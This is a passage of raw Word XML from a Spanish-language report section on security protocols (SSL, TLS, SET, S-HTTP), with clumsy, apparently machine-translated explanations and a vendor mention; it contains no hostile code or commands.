    <w:p w:rsidR="00236265" w:rsidRDefault="00236265" w:rsidP="00236265"/>
    <w:p w:rsidR="00236265" w:rsidRDefault="00236265" w:rsidP="00236265"/>
    <w:p w:rsidR="00236265" w:rsidRDefault="00236265" w:rsidP="00236265"/>
    <w:p w:rsidR="00236265" w:rsidRDefault="00236265" w:rsidP="00236265"/>
    <w:p w:rsidR="00236265" w:rsidRDefault="00236265" w:rsidP="00236265"/>
    <w:p w:rsidR="00236265" w:rsidRDefault="00236265" w:rsidP="00236265"/>
    <w:p w:rsidR="00236265" w:rsidRDefault="00236265" w:rsidP="00236265"/>
    <w:p w:rsidR="00236265" w:rsidRDefault="00236265" w:rsidP="00236265"/>
    <w:p w:rsidR="00236265" w:rsidRDefault="00236265" w:rsidP="00236265"/>
    <w:p w:rsidR="00236265" w:rsidRDefault="00236265" w:rsidP="00236265"/>
    <w:p w:rsidR="00236265" w:rsidRDefault="00236265" w:rsidP="00236265"/>
    <w:p w:rsidR="00236265" w:rsidRDefault="00236265" w:rsidP="00236265"/>
    <w:p w:rsidR="00236265" w:rsidRDefault="00236265" w:rsidP="00236265"/>
    <w:p w:rsidR="00236265" w:rsidRDefault="00236265" w:rsidP="00236265"/>
    <w:p w:rsidR="00236265" w:rsidRPr="00236265" w:rsidRDefault="00236265" w:rsidP="00236265"/>
    <w:p w:rsidR="002E3253" w:rsidRDefault="002E3253" w:rsidP="00DA067C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00236265" w:rsidRDefault="00236265" w:rsidP="00A345FD">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:sectPr w:rsidR="00236265" w:rsidSect="002D6D25">
          <w:headerReference w:type="default" r:id="rId66"/>
          <w:footerReference w:type="default" r:id="rId67"/>
          <w:pgSz w:w="15840" w:h="12240" w:orient="landscape"/>
          <w:pgMar w:top="1701" w:right="1418" w:bottom="1701" w:left="1418" w:header="709" w:footer="709" w:gutter="0"/>
          <w:cols w:space="708"/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A345FD" w:rsidRDefault="00A345FD" w:rsidP="00A345FD">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="_Toc514520849"/>
      <w:r w:rsidRPr="00A345FD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Protocolos de seguridad</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
    </w:p>
    <w:p w:rsidR="00A345FD" w:rsidRDefault="00A345FD" w:rsidP="00A345FD">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A345FD" w:rsidRDefault="00A345FD" w:rsidP="00AB6551">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AB6551" w:rsidRPr="00205514" w:rsidRDefault="00205514" w:rsidP="00205514">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00205514">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>SSL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00205514" w:rsidRPr="00AB6551" w:rsidRDefault="00205514" w:rsidP="00205514">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AB6551" w:rsidRDefault="00AB6551" w:rsidP="00205514">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB6551">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Secure Sockets Layer es un protocolo diseñado para permitir que las aplicaciones para transmitir información de ida y de manera segura hacia atrás. Las aplicaciones que utilizan el protocolo Secure Sockets Layer sí saben cómo dar y recibir claves de cifrado con otras aplicaciones, así como la manera de cifrar y descifrar los datos enviados entre los dos.</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
            <w:color w:val="auto"/>
            <w:szCs w:val="22"/>
            <w:lang w:val="es-ES"/>
          </w:rPr>
          <w:id w:val="720791870"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidRPr="00AB6551">
            <w:rPr>
              <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
              <w:color w:val="auto"/>
              <w:szCs w:val="22"/>
              <w:lang w:val="es-ES"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidRPr="00AB6551">
            <w:rPr>
              <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
              <w:color w:val="auto"/>
              <w:szCs w:val="22"/>
              <w:lang w:val="es-ES"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> CITATION Inc03 \l 3082 </w:instrText>
          </w:r>
          <w:r w:rsidRPr="00AB6551">
            <w:rPr>
              <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
              <w:color w:val="auto"/>
              <w:szCs w:val="22"/>
              <w:lang w:val="es-ES"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="009E53AE">
            <w:rPr>
              <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:szCs w:val="22"/>
              <w:lang w:val="es-ES"/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="009E53AE" w:rsidRPr="009E53AE">
            <w:rPr>
              <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:szCs w:val="22"/>
              <w:lang w:val="es-ES"/>
            </w:rPr>
            <w:t>(Inc, 2003)</w:t>
          </w:r>
          <w:r w:rsidRPr="00AB6551">
            <w:rPr>
              <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
              <w:color w:val="auto"/>
              <w:szCs w:val="22"/>
              <w:lang w:val="es-ES"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
    </w:p>
    <w:p w:rsidR="00205514" w:rsidRPr="00AB6551" w:rsidRDefault="00205514" w:rsidP="00205514">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AB6551" w:rsidRPr="00AB6551" w:rsidRDefault="00AB6551" w:rsidP="00205514">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB6551">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Para establecer una conexión segura SSL, sin embargo, su aplicación debe tener una clave de cifrado que le asigna una autoridad de certificación en la forma de un Certificado. Una vez que haya una única clave de su cuenta, usted puede establecer una conexión segura utilizando el protocolo SSL.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AB6551" w:rsidRPr="00AB6551" w:rsidRDefault="00AB6551" w:rsidP="00205514">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AB6551" w:rsidRPr="00AB6551" w:rsidRDefault="00AB6551" w:rsidP="00205514">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB6551">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Claves de 40-bit de poco se usaron. Cada bit puede contener un uno o un cero - lo que significaba que eran dos 40 claves diferentes disponibles. Eso es un poco más de un billón claves distintas. Debido a la velocidad cada vez mayor de computadoras, se hizo evidente que una clave de 40 bits no era lo suficientemente seguro. Posiblemente, con los procesadores de gama alta que vendría en el futuro, los piratas informáticos podría llegar a probar todas las claves hasta encontrar el adecuado, lo que les permite descifrar y robar información privada. Que tomaría algún tiempo, pero era posible.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AB6551" w:rsidRPr="00AB6551" w:rsidRDefault="00AB6551" w:rsidP="00205514">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AB6551" w:rsidRPr="00AB6551" w:rsidRDefault="00AB6551" w:rsidP="00205514">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB6551">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Las claves se alargaron a 128 bits. Eso es 2128 claves, códigos de cifrado o 340.282.366.920.938.463.463.374.607.431.768.211.456 único. (Eso es 340000000000000 billones de billones, para aquellos de ustedes hacer el seguimiento en casa.) Se determinó que si las computadoras siguió avanzando en la velocidad como lo han hecho en el pasado, estos códigos de 128 bits que permanecen seguros durante por lo menos una década más, si no más. Certificados </w:t>
      </w:r>
      <w:r w:rsidRPr="00AB6551">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>DigiCert no se detienen allí, sin embargo. Los certificados SSL DigiCert también son compatibles con el nuevo estándar de RSA 2048-bit de encriptación.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AB6551" w:rsidRPr="00AB6551" w:rsidRDefault="00AB6551" w:rsidP="00205514">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AB6551" w:rsidRDefault="002973C3" w:rsidP="00205514">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002973C3">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>TLS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002973C3" w:rsidRPr="00AB6551" w:rsidRDefault="002973C3" w:rsidP="00205514">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AB6551" w:rsidRPr="00AB6551" w:rsidRDefault="00AB6551" w:rsidP="002973C3">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB6551">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>El protocolo TLS (Transport Layer Security - Seguridad de la capa de transporte) permite que dos partes se comuniquen con privacidad e integridad de datos. El protocolo TLS ha evolucionado a partir del protocolo SSL 3.0, pero TLS y SSL no pueden interactuar.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AB6551" w:rsidRPr="00AB6551" w:rsidRDefault="00AB6551" w:rsidP="002973C3">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AB6551" w:rsidRDefault="00AB6551" w:rsidP="002973C3">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB6551">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>El protocolo TLS proporciona seguridad en las comunicaciones a través de Internet y permite que las aplicaciones cliente/servidor se comuniquen de forma privada y fiable. El protocolo dispone de dos capas: el Protocolo TLS de registro y el Protocolo TLS de reconocimiento, y estos cuentan con capas por encima de un protocolo de transporte como TCP/IP.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002973C3" w:rsidRPr="00AB6551" w:rsidRDefault="002973C3" w:rsidP="002973C3">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AB6551" w:rsidRDefault="00AB6551" w:rsidP="002973C3">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB6551">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Permite y garantiza el intercambio de datos en un entorno </w:t>
      </w:r>
      <w:r w:rsidR="002973C3">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>seguro</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB6551">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> y privado entre dos entes, el usuario y el servidor, mediante aplicaciones como HTTP, POP3, IMAP, SSH, SMTP o NNTP. Nos referimos al TLS como la evolución del SSL dado que está basado en éste último certificado y funciona de manera muy similar, básicamente: encripta la información compartida.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002973C3" w:rsidRPr="00AB6551" w:rsidRDefault="002973C3" w:rsidP="002973C3">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AB6551" w:rsidRDefault="00AB6551" w:rsidP="002973C3">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB6551">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>¿Cómo la encripta? Mediante dos protocolos en capas diferentes: el protocolo de autenticación (llamado TLS Record Protocol) y el de mutuo acuerdo (también conocido como TLS Handshake Protocol).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002973C3" w:rsidRPr="00AB6551" w:rsidRDefault="002973C3" w:rsidP="002973C3">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AB6551" w:rsidRPr="00AB6551" w:rsidRDefault="00AB6551" w:rsidP="002973C3">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB6551">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>a)  Record:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB6551">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> se lleva a cabo la autenticación para que la transmisión de datos sea mediante una conexión privada y fiable (se negocia la encriptación y la integridad del emisor-receptor)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AB6551" w:rsidRPr="00AB6551" w:rsidRDefault="00AB6551" w:rsidP="002973C3">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB6551">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>b) Handshake:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB6551">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> se negocia el mensaje de manera segura. En cada mensaje se especifica el protocolo en un campo (llamado content_type) y se cifra y empaqueta con un código de autentificación (o MAC).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AB6551" w:rsidRPr="00AB6551" w:rsidRDefault="00AB6551" w:rsidP="00205514">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AB6551" w:rsidRPr="00C167DB" w:rsidRDefault="002973C3" w:rsidP="00205514">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C167DB">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>SET</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C167DB" w:rsidRPr="00AB6551" w:rsidRDefault="00C167DB" w:rsidP="00205514">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AB6551" w:rsidRPr="00AB6551" w:rsidRDefault="00AB6551" w:rsidP="00C167DB">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB6551">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Secure Electronic Transaction</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB6551">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> es un protocolo que ofrece paquetes de datos para todas las transacciones y cada transacción es autentificada con una firma digital. Esta normativa apareció con el auge de las páginas que venden directamente sus productos  y servicios a través de la red.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AB6551" w:rsidRPr="00AB6551" w:rsidRDefault="00AB6551" w:rsidP="00C167DB">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB6551">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Cuando se realiza una transacción segura por medio de SET, los datos del cliente son enviados al servidor del vendedor, pero dicho vendedor sólo recibe la orden. Los números de la tarjeta del banco se envían directamente al banco del vendedor, quien podrá leer los detalles de la cuenta bancaria del comprador y contactar con el banco para verificarlos en tiempo real.  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AB6551" w:rsidRPr="00AB6551" w:rsidRDefault="00AB6551" w:rsidP="00C167DB">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB6551">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Este tipo de método requiere una firma electrónica del usuario de la tarjeta para verificar que es su propietario.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AB6551" w:rsidRPr="00AB6551" w:rsidRDefault="00AB6551" w:rsidP="00205514">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AB6551" w:rsidRDefault="00AB6551" w:rsidP="00205514">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB6551">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>S-HTTP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C167DB" w:rsidRPr="00AB6551" w:rsidRDefault="00C167DB" w:rsidP="00205514">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AB6551" w:rsidRDefault="00AB6551" w:rsidP="00C167DB">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB6551">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">A diferencia de SSL (Secure Socket Layer) que funciona transportando capas, SHTTP garantiza la seguridad del mensaje mediante el protocolo HTTP, que marca individualmente los documentos HTML con certificados. En tanto que SSL es independiente de la aplicación utilizada y puede cifrar todo tipo de comunicación, SHTTP está íntimamente relacionado con el protocolo HTTP y cifra mensajes de forma individual. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C167DB" w:rsidRPr="00AB6551" w:rsidRDefault="00C167DB" w:rsidP="00C167DB">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AB6551" w:rsidRDefault="00AB6551" w:rsidP="00C167DB">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB6551">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Todos los productos MasterBase® trabajan únicamente con protocolo https. Contamos con un área exclusivamente dedicada a revisar en forma periódica y exhaustiva todos nuestros componentes, elementos y aplicaciones, para asegurar </w:t>
      </w:r>
      <w:r w:rsidRPr="00AB6551">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>que estamos en consonancia con las últimas actualizaciones de seguridad, las cuales varían día a día.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C167DB" w:rsidRPr="00AB6551" w:rsidRDefault="00C167DB" w:rsidP="00C167DB">
      <w:pPr>
